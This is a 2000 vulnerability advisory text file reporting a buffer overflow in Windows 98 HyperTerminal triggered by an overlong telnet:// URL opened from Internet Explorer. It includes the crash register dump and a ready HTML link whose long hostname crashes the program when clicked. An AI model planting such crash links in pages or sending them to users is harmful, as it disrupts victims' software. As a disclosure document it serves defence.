/\__ ____ _ adv_telnet1.txt
/\__ ____ _ /\____ /\__ ____
\_ \ / _//\_ /:\ /\ /\_ ___ /\____ \___ \ \_ | _/
/ : \/ . \ . | (__) | \. )\___ \ / .) \ / : \
/ . . \ \_) . | / \ | / ( )__) / \ / \
( ( ) )._) |___( )| . \ /\_. \( : )( : )
\__/\_/\ /_ )_____ )\ / \__\_ )\____ )\___|_ / \___|_ /
\/ \/ \/ \/ \/ \/ \/ \/
---------------------------------------------------Meliksah Ozoral
----------------------------------------------------[ICQ 10390761]
[telnet:// Buffer Overflow Vulnereability]------------------------
------------------------------------------------------[05/09/2000]
[www.meliksah.net]------------------------------------------------
Hi,
I don't know if this has been reported before. Windows run default telnet program when it get link like telnet://somehost in exp
lorer.
Default telnet program is HyperTerminal under Windows 98 (NOT NT).
Windows Call HyperTerminal, when I wrote telnet://www.meliksah.net in internet explorer. telnet://153 characters long hostname c
ause
buffer overflow in HyperTerminal.
HYPERTRM caused an invalid page fault in
module HYPERTRM.DLL at 0177:7d9fdcf4.
Registers:
EAX=00000065 CS=0177 EIP=7d9fdcf4 EFLGS=00010206
EBX=00000000 SS=017f ESP=0063f8e4 EBP=0063f91c
ECX=0063fc1c DS=017f ESI=00000065 FS=5c3f
EDX=00000000 ES=017f EDI=00665d50 GS=7c7f
Bytes at CS:EIP:
8b 7e 08 8d 9f 08 01 00 00 53 ff 15 f8 86 a2 7d
Stack dump:
00665d50 0066593c 00000000 7da1b94b 00000065 000006f8 0066593c 274d0010
7d9f4222 00663900 00000002 0063f9b0 00000050 7da1ad25 0063fa00 7da1ad5e
I didn't try ro run code by using this bug but we can use this bug on remote computers.
<p><ahref="telnet://meliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahn
etmeliksahnetmeliksahnetmeliksahnetmeliksahne">Click Here</a></p>
This URL cause crash HyperTerminal.
This bug tested on
Windows 98 [Version 4.10.1998]
Windows 98 [Version 4.10.2222]
\___ \/ ___/ E
/ \ L __/\__
_/ \_ I \ OO /
\ \ / / K / \/ \
\\ //\/\\ // $ ~~\/~~
\\ / \\ / A 2000
\/ \/ H